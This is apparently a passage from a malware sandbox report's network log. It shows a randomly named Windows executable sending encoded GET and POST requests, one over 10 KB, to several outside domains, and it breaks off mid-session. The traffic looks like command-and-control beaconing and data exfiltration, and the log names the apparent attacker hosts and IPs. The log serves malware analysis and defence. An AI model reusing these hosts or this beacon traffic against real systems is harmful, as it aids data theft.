                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49827 | 43.205.198.29 | 80 | 4548 | C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 12:42:38.404337883 CET | 453 | OUT | GET /6pwo/?AFF=OcYLCa3XOMtt+RsgzD1zLQYXF21NRX3aDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abnTc9bVWqvwMitNejIQMZs4A8D92e/CCvcvI=&qjBT=BfTHe4BP_zkdflN HTTP/1.1
                                                Host: www.1secondlending.one
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Nov 22, 2024 12:42:39.874555111 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:42:39 GMT
                                                Content-Type: text/html
                                                Content-Length: 548
                                                Connection: close
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49843 | 172.67.220.36 | 80 | 4548 | C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 12:42:45.372070074 CET | 728 | OUT | POST /rk61/ HTTP/1.1
                                                Host: www.supernutra01.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 200
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.supernutra01.online
                                                Referer: http://www.supernutra01.online/rk61/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Ascii: AFF=1L2P5XVtv5AyF5PnrbCTlXDL6nZGMttoEs9uyOGtHOYpl4DAjz6SSI/iXBu0qAq+pGZW+W4p9ncPBbbd75QIQmRR4hiA/llzIiGK+lJZKig0HOIvF64k/Nn6iLmsZlD5GO1z3H7iftS1Dq3LnWt6ESuUmBPbhOnDrsgrHHpJDcLS+fsSA8FQXuVMohSq3Qinwg==
Nov 22, 2024 12:42:46.715147018 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                Date: Fri, 22 Nov 2024 11:42:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81ycgb2%2BG4%2F%2B5M0pOmCcjWUgI3McX8MJv1HTOinV6hqPg0q6ITGDCzP5ZalXtycOWJ3lqCoqQAEHrRjoQSz2eAElOdFovxJ07jZkVugLSwnXlEw7N4MP9b6l7RN0v%2BvwbG0FUrBrsAWR0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e68a87378d8c3f0-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1467&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=728&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome fri
                                                Nov 22, 2024 12:42:46.715178013 CET | 91 | IN | Data Raw: 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67
                                                Data Ascii: endly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                Nov 22, 2024 12:42:46.715779066 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.4 | 49850 | 172.67.220.36 | 80 | 4548 | C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 22, 2024 12:42:48.032150030 CET | 748 | OUT | POST /rk61/ HTTP/1.1
                                                Host: www.supernutra01.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 220
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.supernutra01.online
                                                Referer: http://www.supernutra01.online/rk61/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 31 4c 32 50 35 58 56 74 76 35 41 79 45 5a 2f 6e 74 36 43 54 67 33 44 49 6d 33 5a 47 43 4e 74 73 45 73 78 75 79 4c 69 39 48 34 41 70 6c 64 2f 41 69 79 36 53 52 49 2f 69 66 68 75 74 30 77 71 44 70 47 64 65 2b 53 34 70 39 6a 30 50 42 66 58 64 37 4b 34 58 42 6d 52 66 78 42 69 56 69 56 6c 7a 49 69 47 4b 2b 6a 6c 2f 4b 69 6f 30 47 2b 34 76 58 76 59 6c 6a 64 6e 35 31 37 6d 73 64 6c 44 39 47 4f 31 56 33 46 65 48 66 75 71 31 44 76 4c 4c 70 6a 42 35 4c 53 75 53 37 78 4f 2f 78 63 6e 4c 68 4f 31 7a 49 42 78 72 45 2b 54 58 32 35 68 49 52 4e 6b 48 46 75 78 2f 31 6d 62 65 36 54 66 75 72 6b 72 61 73 32 6f 47 72 55 69 49 65 41 72 4f 59 4b 4c 65 46 58 77 3d
                                                Data Ascii: AFF=1L2P5XVtv5AyEZ/nt6CTg3DIm3ZGCNtsEsxuyLi9H4Apld/Aiy6SRI/ifhut0wqDpGde+S4p9j0PBfXd7K4XBmRfxBiViVlzIiGK+jl/Kio0G+4vXvYljdn517msdlD9GO1V3FeHfuq1DvLLpjB5LSuS7xO/xcnLhO1zIBxrE+TX25hIRNkHFux/1mbe6Tfurkras2oGrUiIeArOYKLeFXw=
                                                Nov 22, 2024 12:42:49.383327007 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                Date: Fri, 22 Nov 2024 11:42:49 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UYWvK%2Fj1EzZ2vv0eoDQjGxnGP%2FFg3Lc6VeGqNcTApnTaornKmGV00%2F%2FrH3QA%2BTLZvm0X9HAIGuqY4x%2FcOHM74I8zdY7kjCSDzIFoyBUOjiR%2FbW%2Bk3KQrTsEHUMFHSp5q4%2FWnlU17QgxHXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e68a8843b2a428f-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=748&delivery_rate=0&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and C
                                                Nov 22, 2024 12:42:49.383393049 CET | 105 | IN | Data Raw: 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20
                                                Data Ascii: hrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.4 | 49859 | 172.67.220.36 | 80 | 4548 | C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 22, 2024 12:42:50.814327955 CET | 10830 | OUT | POST /rk61/ HTTP/1.1
                                                Host: www.supernutra01.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 10300
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.supernutra01.online
                                                Referer: http://www.supernutra01.online/rk61/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 31 4c 32 50 35 58 56 74 76 35 41 79 45 5a 2f 6e 74 36 43 54 67 33 44 49 6d 33 5a 47 43 4e 74 73 45 73 78 75 79 4c 69 39 48 34 49 70 6c 76 6e 41 6a 52 69 53 51 49 2f 69 56 42 75 77 30 77 71 53 70 47 6c 61 2b 53 39 53 39 6c 77 50 43 36 4c 64 39 37 34 58 49 6d 52 66 38 68 6a 79 2f 6c 6c 6d 49 69 57 4f 2b 6a 56 2f 4b 69 6f 30 47 39 67 76 48 4b 34 6c 68 64 6e 36 69 4c 6d 6f 5a 6c 44 5a 47 4f 74 72 33 46 62 79 44 4f 4b 31 44 50 37 4c 6c 78 35 35 47 53 75 51 72 68 4f 6e 78 63 71 56 68 4f 70 2f 49 42 74 52 45 38 50 58 31 4f 56 55 4e 5a 6f 65 65 34 68 56 6e 68 72 57 33 69 4c 31 71 32 37 32 68 44 4d 48 35 33 43 4c 64 53 32 56 63 37 6e 6b 62 58 30 75 45 79 35 56 52 52 66 48 2b 54 53 53 31 4c 35 6d 69 42 36 6c 4d 4a 38 2b 79 35 34 46 2b 4e 46 32 73 45 6d 56 7a 42 2b 65 4a 72 64 68 66 38 62 63 74 48 68 35 63 6e 66 55 59 2b 71 7a 31 4e 6b 37 39 49 69 37 47 6d 42 42 55 64 49 55 74 4b 42 51 58 77 35 52 75 39 71 32 65 39 52 66 4d 4c 6c 61 34 59 48 69 35 52 2b 4c 69 6a 2b 33 66 41 5a 7a 2f 6b 68 6d 78 69 [TRUNCATED]
                                                Data Ascii: AFF=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 [TRUNCATED]
                                                Nov 22, 2024 12:42:52.183542967 CET | 764 | IN | HTTP/1.1 405 Not Allowed
                                                Date: Fri, 22 Nov 2024 11:42:52 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Me4pb2HezoWbUuf5uR7AL0Y0Y3fVbxuxDkpGZJSv7REmHJ2fDkPqggloMGmfu2XrgihYSV1OrGT%2BtB7f%2BAezCCA%2Frx5noS2DoKVsj8dgAzn7LhI9BNxV9nu4td24ivgA7jbJmkv%2F2DfMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e68a8959e1c4327-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1583&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10830&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Nov 22, 2024 12:42:52.184073925 CET | 571 | IN | Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20
                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.4 | 49866 | 172.67.220.36 | 80 | 4548 | C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 22, 2024 12:42:53.569525003 CET | 454 | OUT | GET /rk61/?qjBT=BfTHe4BP_zkdflN&AFF=4Jev6jkxg6xEO7Dapp2OtVT6jS0ALsNacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9NGZN+wjn/QV3LQCc1WVNeTcwGOVDWPFPiYw= HTTP/1.1
                                                Host: www.supernutra01.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Nov 22, 2024 12:42:54.964524984 CET | 1236 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 22 Nov 2024 11:42:54 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                                                Accept-Ranges: bytes
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hcUZDAuwOX2D3Expn4lBL2y49LwHK84hn%2FwIxbTug98WWIUqyGyIhRM1udAXvNHyMpVnhzjcHuzC%2F24E4KVYFuqZYfYq71NuGQUbFtnS1JGyJ0Gz0RNL94k2vD%2FV4e9zHCmBpKvQa%2FozaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e68a8a6fb9a43da-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1612&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=454&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED]
                                                Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-blo
                                                Nov 22, 2024 12:42:54.964586020 CET | 1236 | IN | Data Raw: 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 2c 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72
                                                Data Ascii: ck}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Ro
                                                Nov 22, 2024 12:42:54.964608908 CET | 1236 | IN | Data Raw: 75 74 65 3b 74 6f 70 3a 2d 32 34 30 70 78 3b 72 69 67 68 74 3a 2d 33 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 20 2e 73 76 67 2d 74 77 6f 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 74
                                                Data Ascii: ute;top:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line-height:1.2777777778}.windo
                                                Nov 22, 2024 12:42:54.964627981 CET | 1236 | IN | Data Raw: 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 38 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e
                                                Data Ascii: indow-main__item{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{p
                                                Nov 22, 2024 12:42:54.964639902 CET | 1236 | IN | Data Raw: 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b
                                                Data Ascii: 8.7804878049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100v
                                                Nov 22, 2024 12:42:54.964651108 CET | 1236 | IN | Data Raw: 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33
                                                Data Ascii: rem)/ 25.625)}}@supports (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170
                                                Nov 22, 2024 12:42:54.964663982 CET | 1236 | IN | Data Raw: 73 20 6e 6f 74 20 28 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64
                                                Data Ascii: s not (margin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-color: #0E0F14;}a:hover{border: 2
                                                Nov 22, 2024 12:42:54.964772940 CET | 1236 | IN | Data Raw: 31 32 43 33 39 36 2e 33 39 32 20 32 33 38 2e 38 35 39 20 34 30 34 2e 37 32 38 20 32 39 38 2e 32 35 36 20 33 37 38 2e 30 36 37 20 33 35 33 2e 37 38 36 43 33 35 31 2e 34 30 35 20 34 30 39 2e 33 31 37 20 32 39 39 2e 38 34 31 20 34 33 39 2e 39 35 33
                                                Data Ascii: 12C396.392 238.859 404.728 298.256 378.067 353.786C351.405 409.317 299.841 439.953 262.896 422.214Z" fill="#013F93" /></g><defs><filter id="filter0_f_2001_5" x="0.329773" y="0.914673" width="629.662" height="810.506" filt
                                                Nov 22, 2024 12:42:54.964817047 CET | 1236 | IN | Data Raw: 61 6c 22 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69 63 22 20 69 6e 32 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75 6c 74 3d 22 73 68 61 70 65 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 47 61 75 73 73
                                                Data Ascii: al" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="90" result="effect1_foregroundBlur_2001_5" /></filter></defs></svg><h1 class="window-main__title">Why am I seei
                                                Nov 22, 2024 12:42:54.964829922 CET | 1236 | IN | Data Raw: 22 20 63 79 3d 22 31 33 34 2e 32 39 39 22 20 72 78 3d 22 31 31 32 2e 35 33 34 22 20 72 79 3d 22 31 33 34 2e 32 39 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 2d 30 2e 39 31 36 33 36 36 20 30 2e 34 30 30 33 34 31 20 2d 30 2e 31
                                                Data Ascii: " cy="134.299" rx="112.534" ry="134.299" transform="matrix(-0.916366 0.400341 -0.15071 -0.988578 379.183 586.577)" fill="#15B1F9" /></g><g opacity="0.8" filter="url(#filter1_f_2001_10)"><path d="M259.743 638.552C361.981 4
                                                Nov 22, 2024 12:42:54.976654053 CET | 167 | IN | Data Raw: 44 65 76 69 61 74 69 6f 6e 3d 22 39 30 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 31 30 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09 09 09 09 3c
                                                Data Ascii: Deviation="90" result="effect1_foregroundBlur_2001_10" /></filter></defs></svg></div></section></main></div></body></html>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.2.4 | 49882 | 194.245.148.189 | 80 | 4548 | C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 22, 2024 12:43:00.595241070 CET | 725 | OUT | POST /hakt/ HTTP/1.1
                                                Host: www.wine-drinkers.club
